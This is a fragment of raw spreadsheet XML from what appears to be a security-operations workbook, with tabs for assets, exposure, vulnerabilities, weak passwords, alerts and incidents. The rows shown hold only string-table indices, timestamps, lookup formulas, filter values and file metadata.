      <c r="BB185" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC185" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD185" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="186" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A186" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B186" s="2">
        <v>46052.5943055556</v>
      </c>
      <c r="C186" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D186" s="10" t="s">
        <v>12201</v>
      </c>
      <c r="E186" s="10"/>
      <c r="F186" s="10"/>
      <c r="G186" s="10"/>
      <c r="H186" s="10"/>
      <c r="I186" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J186" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K186" s="10"/>
      <c r="L186" s="10"/>
      <c r="M186" s="10"/>
      <c r="N186" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O186" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P186" s="10" t="s">
        <v>12202</v>
      </c>
      <c r="Q186" s="10"/>
      <c r="R186" s="10"/>
      <c r="S186" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T186" s="10"/>
      <c r="U186" s="10"/>
      <c r="V186" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W186" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X186" s="10"/>
      <c r="Y186" s="10" t="s">
        <v>12203</v>
      </c>
      <c r="Z186" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA186" s="10"/>
      <c r="AB186" s="10"/>
      <c r="AC186" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AD186" s="14"/>
      <c r="AE186" s="14"/>
      <c r="AF186" s="14"/>
      <c r="AG186" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AH186" s="10"/>
      <c r="AI186" s="10"/>
      <c r="AJ186" s="10"/>
      <c r="AK186" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL186" s="10" t="s">
        <v>12204</v>
      </c>
      <c r="AM186" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN186" s="10"/>
      <c r="AO186" s="10"/>
      <c r="AP186" s="10"/>
      <c r="AQ186" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR186" s="10"/>
      <c r="AS186" s="10" t="s">
        <v>12172</v>
      </c>
      <c r="AT186" s="10"/>
      <c r="AU186" s="10"/>
      <c r="AV186" s="10" t="s">
        <v>12173</v>
      </c>
      <c r="AW186" s="10"/>
      <c r="AX186" s="14"/>
      <c r="AY186" s="1" t="e">
        <f>VLOOKUP(E186,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ186" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA186" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB186" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC186" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD186" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="187" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A187" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B187" s="2">
        <v>46059.4420949074</v>
      </c>
      <c r="C187" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D187" s="10" t="s">
        <v>12205</v>
      </c>
      <c r="E187" s="10"/>
      <c r="F187" s="10"/>
      <c r="G187" s="10"/>
      <c r="H187" s="10"/>
      <c r="I187" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J187" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K187" s="10"/>
      <c r="L187" s="10"/>
      <c r="M187" s="10"/>
      <c r="N187" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O187" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P187" s="10" t="s">
        <v>12206</v>
      </c>
      <c r="Q187" s="10"/>
      <c r="R187" s="10"/>
      <c r="S187" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T187" s="10"/>
      <c r="U187" s="10"/>
      <c r="V187" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W187" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X187" s="10"/>
      <c r="Y187" s="10" t="s">
        <v>12207</v>
      </c>
      <c r="Z187" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA187" s="10"/>
      <c r="AB187" s="10"/>
      <c r="AC187" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AD187" s="14"/>
      <c r="AE187" s="14"/>
      <c r="AF187" s="14"/>
      <c r="AG187" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AH187" s="10"/>
      <c r="AI187" s="10"/>
      <c r="AJ187" s="10"/>
      <c r="AK187" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL187" s="10" t="s">
        <v>12208</v>
      </c>
      <c r="AM187" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN187" s="10"/>
      <c r="AO187" s="10"/>
      <c r="AP187" s="10"/>
      <c r="AQ187" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR187" s="10"/>
      <c r="AS187" s="10" t="s">
        <v>12172</v>
      </c>
      <c r="AT187" s="10"/>
      <c r="AU187" s="10"/>
      <c r="AV187" s="10" t="s">
        <v>12173</v>
      </c>
      <c r="AW187" s="10"/>
      <c r="AX187" s="14"/>
      <c r="AY187" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ187" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA187" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB187" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC187" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD187" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="188" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A188" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B188" s="2">
        <v>46059.6016087963</v>
      </c>
      <c r="C188" s="10" t="s">
        <v>11732</v>
      </c>
      <c r="D188" s="10" t="s">
        <v>12209</v>
      </c>
      <c r="E188" s="10"/>
      <c r="F188" s="10"/>
      <c r="G188" s="10"/>
      <c r="H188" s="10"/>
      <c r="I188" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J188" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K188" s="10"/>
      <c r="L188" s="10"/>
      <c r="M188" s="10"/>
      <c r="N188" s="10" t="s">
        <v>11734</v>
      </c>
      <c r="O188" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P188" s="10" t="s">
        <v>12210</v>
      </c>
      <c r="Q188" s="10"/>
      <c r="R188" s="10"/>
      <c r="S188" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T188" s="10"/>
      <c r="U188" s="10"/>
      <c r="V188" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W188" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X188" s="10"/>
      <c r="Y188" s="10" t="s">
        <v>12211</v>
      </c>
      <c r="Z188" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA188" s="10"/>
      <c r="AB188" s="10"/>
      <c r="AC188" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AD188" s="14"/>
      <c r="AE188" s="14"/>
      <c r="AF188" s="14"/>
      <c r="AG188" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AH188" s="10"/>
      <c r="AI188" s="10"/>
      <c r="AJ188" s="10"/>
      <c r="AK188" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL188" s="10"/>
      <c r="AM188" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN188" s="10"/>
      <c r="AO188" s="10"/>
      <c r="AP188" s="10"/>
      <c r="AQ188" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR188" s="10"/>
      <c r="AS188" s="10" t="s">
        <v>12172</v>
      </c>
      <c r="AT188" s="10"/>
      <c r="AU188" s="10"/>
      <c r="AV188" s="10" t="s">
        <v>12173</v>
      </c>
      <c r="AW188" s="10"/>
      <c r="AX188" s="14"/>
      <c r="AY188" s="1" t="e">
        <f>VLOOKUP(E188,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ188" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA188" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB188" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC188" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD188" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="189" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A189" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B189" s="2">
        <v>46079.6532638889</v>
      </c>
      <c r="C189" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D189" s="10" t="s">
        <v>12212</v>
      </c>
      <c r="E189" s="10"/>
      <c r="F189" s="10"/>
      <c r="G189" s="10"/>
      <c r="H189" s="10"/>
      <c r="I189" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J189" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K189" s="10"/>
      <c r="L189" s="10"/>
      <c r="M189" s="10"/>
      <c r="N189" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O189" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P189" s="10" t="s">
        <v>12213</v>
      </c>
      <c r="Q189" s="10"/>
      <c r="R189" s="10"/>
      <c r="S189" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T189" s="10"/>
      <c r="U189" s="10"/>
      <c r="V189" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W189" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X189" s="10"/>
      <c r="Y189" s="10" t="s">
        <v>12214</v>
      </c>
      <c r="Z189" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA189" s="10"/>
      <c r="AB189" s="10"/>
      <c r="AC189" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AD189" s="14"/>
      <c r="AE189" s="14"/>
      <c r="AF189" s="14"/>
      <c r="AG189" s="14">
        <v>46081.6274652778</v>
      </c>
      <c r="AH189" s="10"/>
      <c r="AI189" s="10"/>
      <c r="AJ189" s="10"/>
      <c r="AK189" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL189" s="10" t="s">
        <v>12215</v>
      </c>
      <c r="AM189" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN189" s="10"/>
      <c r="AO189" s="10"/>
      <c r="AP189" s="10"/>
      <c r="AQ189" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR189" s="10"/>
      <c r="AS189" s="10" t="s">
        <v>12172</v>
      </c>
      <c r="AT189" s="10"/>
      <c r="AU189" s="10"/>
      <c r="AV189" s="10" t="s">
        <v>12173</v>
      </c>
      <c r="AW189" s="10"/>
      <c r="AX189" s="14"/>
      <c r="AY189" s="1" t="e">
        <f>VLOOKUP(E189,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ189" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA189" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB189" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC189" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD189" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="190" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A190" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B190" s="2">
        <v>46086.4138657407</v>
      </c>
      <c r="C190" s="10" t="s">
        <v>11732</v>
      </c>
      <c r="D190" s="10" t="s">
        <v>12216</v>
      </c>
      <c r="E190" s="10"/>
      <c r="F190" s="10"/>
      <c r="G190" s="10"/>
      <c r="H190" s="10"/>
      <c r="I190" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J190" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K190" s="10"/>
      <c r="L190" s="10"/>
      <c r="M190" s="10"/>
      <c r="N190" s="10" t="s">
        <v>11734</v>
      </c>
      <c r="O190" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P190" s="10" t="s">
        <v>12217</v>
      </c>
      <c r="Q190" s="10"/>
      <c r="R190" s="10"/>
      <c r="S190" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T190" s="10"/>
      <c r="U190" s="10"/>
      <c r="V190" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W190" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X190" s="10"/>
      <c r="Y190" s="10" t="s">
        <v>12218</v>
      </c>
      <c r="Z190" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA190" s="10"/>
      <c r="AB190" s="10"/>
      <c r="AC190" s="14">
        <v>46086.4369097222</v>
      </c>
      <c r="AD190" s="14"/>
      <c r="AE190" s="14"/>
      <c r="AF190" s="14"/>
      <c r="AG190" s="14">
        <v>46086.4369097222</v>
      </c>
      <c r="AH190" s="10"/>
      <c r="AI190" s="10"/>
      <c r="AJ190" s="10"/>
      <c r="AK190" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL190" s="10"/>
      <c r="AM190" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN190" s="10"/>
      <c r="AO190" s="10"/>
      <c r="AP190" s="10"/>
      <c r="AQ190" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR190" s="10"/>
      <c r="AS190" s="10" t="s">
        <v>12219</v>
      </c>
      <c r="AT190" s="10"/>
      <c r="AU190" s="10"/>
      <c r="AV190" s="10" t="s">
        <v>12220</v>
      </c>
      <c r="AW190" s="10"/>
      <c r="AX190" s="14"/>
      <c r="AY190" s="1" t="e">
        <f>VLOOKUP(E190,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ190" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA190" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB190" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC190" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD190" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="191" s="1" customFormat="1" spans="1:56">
      <c r="A191" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B191" s="2">
        <v>46090.5363888889</v>
      </c>
      <c r="C191" s="10" t="s">
        <v>12221</v>
      </c>
      <c r="D191" s="10" t="s">
        <v>9156</v>
      </c>
      <c r="E191" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="F191" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G191" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="H191" s="10"/>
      <c r="I191" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J191" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K191" s="10"/>
      <c r="L191" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M191" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N191" s="10" t="s">
        <v>12222</v>
      </c>
      <c r="O191" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P191" s="10"/>
      <c r="Q191" s="10"/>
      <c r="R191" s="10"/>
      <c r="S191" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T191" s="10" t="s">
        <v>123</v>
      </c>
      <c r="U191" s="10" t="s">
        <v>8436</v>
      </c>
      <c r="V191" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W191" s="10"/>
      <c r="X191" s="10" t="s">
        <v>12223</v>
      </c>
      <c r="Y191" s="10" t="s">
        <v>9159</v>
      </c>
      <c r="Z191" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA191" s="10"/>
      <c r="AB191" s="10" t="s">
        <v>3315</v>
      </c>
      <c r="AC191" s="14">
        <v>46097.401724537</v>
      </c>
      <c r="AD191" s="14">
        <v>46090.5352662037</v>
      </c>
      <c r="AE191" s="14">
        <v>46090.5402314815</v>
      </c>
      <c r="AF191" s="14">
        <v>46097.401724537</v>
      </c>
      <c r="AG191" s="14">
        <v>46097.401724537</v>
      </c>
      <c r="AH191" s="10"/>
      <c r="AI191" s="10"/>
      <c r="AJ191" s="10"/>
      <c r="AK191" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL191" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="AM191" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN191" s="10"/>
      <c r="AO191" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP191" s="10"/>
      <c r="AQ191" s="10" t="s">
        <v>12224</v>
      </c>
      <c r="AR191" s="10"/>
      <c r="AS191" s="10"/>
      <c r="AT191" s="10"/>
      <c r="AU191" s="10"/>
      <c r="AV191" s="10" t="s">
        <v>12225</v>
      </c>
      <c r="AW191" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX191" s="14">
        <v>46090.5402314815</v>
      </c>
      <c r="AY191" s="1" t="str">
        <f>VLOOKUP(E191,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ191" s="9">
        <f t="shared" si="26"/>
        <v>1.62</v>
      </c>
      <c r="BA191" s="9">
        <f t="shared" si="30"/>
        <v>5.53</v>
      </c>
      <c r="BB191" s="9">
        <f t="shared" si="27"/>
        <v>5.53</v>
      </c>
      <c r="BC191" s="9">
        <f t="shared" si="28"/>
        <v>9886.08</v>
      </c>
      <c r="BD191" s="9">
        <f t="shared" si="29"/>
        <v>9886.08</v>
      </c>
    </row>
    <row r="192" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A192" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B192" s="2">
        <v>46091.6809953704</v>
      </c>
      <c r="C192" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D192" s="10" t="s">
        <v>12226</v>
      </c>
      <c r="E192" s="10"/>
      <c r="F192" s="10"/>
      <c r="G192" s="10"/>
      <c r="H192" s="10"/>
      <c r="I192" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J192" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K192" s="10"/>
      <c r="L192" s="10"/>
      <c r="M192" s="10"/>
      <c r="N192" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O192" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P192" s="10" t="s">
        <v>12227</v>
      </c>
      <c r="Q192" s="10"/>
      <c r="R192" s="10"/>
      <c r="S192" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T192" s="10"/>
      <c r="U192" s="10"/>
      <c r="V192" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W192" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X192" s="10"/>
      <c r="Y192" s="10" t="s">
        <v>12228</v>
      </c>
      <c r="Z192" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA192" s="10"/>
      <c r="AB192" s="10"/>
      <c r="AC192" s="14">
        <v>46098.4460300926</v>
      </c>
      <c r="AD192" s="14"/>
      <c r="AE192" s="14"/>
      <c r="AF192" s="14"/>
      <c r="AG192" s="14">
        <v>46098.4460300926</v>
      </c>
      <c r="AH192" s="10"/>
      <c r="AI192" s="10"/>
      <c r="AJ192" s="10"/>
      <c r="AK192" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL192" s="10"/>
      <c r="AM192" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN192" s="10"/>
      <c r="AO192" s="10"/>
      <c r="AP192" s="10"/>
      <c r="AQ192" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR192" s="10"/>
      <c r="AS192" s="10" t="s">
        <v>12229</v>
      </c>
      <c r="AT192" s="10"/>
      <c r="AU192" s="10"/>
      <c r="AV192" s="10" t="s">
        <v>12230</v>
      </c>
      <c r="AW192" s="10"/>
      <c r="AX192" s="14"/>
      <c r="AY192" s="1" t="e">
        <f>VLOOKUP(E192,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ192" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA192" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB192" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC192" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD192" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
    <row r="193" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A193" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B193" s="2">
        <v>46094.6038888889</v>
      </c>
      <c r="C193" s="10" t="s">
        <v>11721</v>
      </c>
      <c r="D193" s="10" t="s">
        <v>12231</v>
      </c>
      <c r="E193" s="10"/>
      <c r="F193" s="10"/>
      <c r="G193" s="10"/>
      <c r="H193" s="10"/>
      <c r="I193" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J193" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K193" s="10"/>
      <c r="L193" s="10"/>
      <c r="M193" s="10"/>
      <c r="N193" s="10" t="s">
        <v>11723</v>
      </c>
      <c r="O193" s="17" t="s">
        <v>11624</v>
      </c>
      <c r="P193" s="10" t="s">
        <v>12232</v>
      </c>
      <c r="Q193" s="10"/>
      <c r="R193" s="10"/>
      <c r="S193" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T193" s="10"/>
      <c r="U193" s="10"/>
      <c r="V193" s="12" t="s">
        <v>8377</v>
      </c>
      <c r="W193" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X193" s="10"/>
      <c r="Y193" s="10" t="s">
        <v>12233</v>
      </c>
      <c r="Z193" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA193" s="10"/>
      <c r="AB193" s="10"/>
      <c r="AC193" s="14">
        <v>46094.621712963</v>
      </c>
      <c r="AD193" s="10"/>
      <c r="AE193" s="10"/>
      <c r="AF193" s="14"/>
      <c r="AG193" s="14">
        <v>46094.621712963</v>
      </c>
      <c r="AH193" s="10"/>
      <c r="AI193" s="10"/>
      <c r="AJ193" s="10"/>
      <c r="AK193" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL193" s="10"/>
      <c r="AM193" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN193" s="10"/>
      <c r="AO193" s="10"/>
      <c r="AP193" s="10"/>
      <c r="AQ193" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR193" s="10"/>
      <c r="AS193" s="14" t="s">
        <v>12234</v>
      </c>
      <c r="AT193" s="10"/>
      <c r="AU193" s="10"/>
      <c r="AV193" s="10" t="s">
        <v>12235</v>
      </c>
      <c r="AW193" s="10"/>
      <c r="AX193" s="14"/>
      <c r="AY193" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ193" s="9" t="str">
        <f t="shared" si="26"/>
        <v/>
      </c>
      <c r="BA193" s="9" t="str">
        <f t="shared" si="30"/>
        <v/>
      </c>
      <c r="BB193" s="9" t="str">
        <f t="shared" si="27"/>
        <v/>
      </c>
      <c r="BC193" s="9" t="str">
        <f t="shared" si="28"/>
        <v/>
      </c>
      <c r="BD193" s="9" t="str">
        <f t="shared" si="29"/>
        <v/>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:BD193" etc:filterBottomFollowUsedRange="0">
    <filterColumn colId="54">
      <filters>
        <filter val="25449.62"/>
        <filter val="3133.83"/>
        <filter val="3142.83"/>
        <filter val="44572.83"/>
        <filter val="21347.25"/>
        <filter val="9597.07"/>
        <filter val="150422.58"/>
        <filter val="9886.08"/>
        <filter val="73503.83"/>
        <filter val="16221.23"/>
        <filter val="29475.17"/>
        <filter val="147846.38"/>
        <filter val="63415.5"/>
        <filter val="25031.8"/>
        <filter val="64880.08"/>
        <filter val="17339.43"/>
        <filter val="19151.85"/>
        <filter val="8313.17"/>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可视化看板</vt:lpstr>
      <vt:lpstr>数据统计</vt:lpstr>
      <vt:lpstr>运营机制</vt:lpstr>
      <vt:lpstr>资产表</vt:lpstr>
      <vt:lpstr>暴露面</vt:lpstr>
      <vt:lpstr>资产漏洞表</vt:lpstr>
      <vt:lpstr>弱密码</vt:lpstr>
      <vt:lpstr>告警表</vt:lpstr>
      <vt:lpstr>事件表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π</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-17T07:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-01T07:43:14Z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BAE9F7C6A69F086D2E409368F7114755_43</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.25225</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateUUID">
    <vt:lpwstr>v1.0_mb_VL70KuMiRIZrijaVhgeoWQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>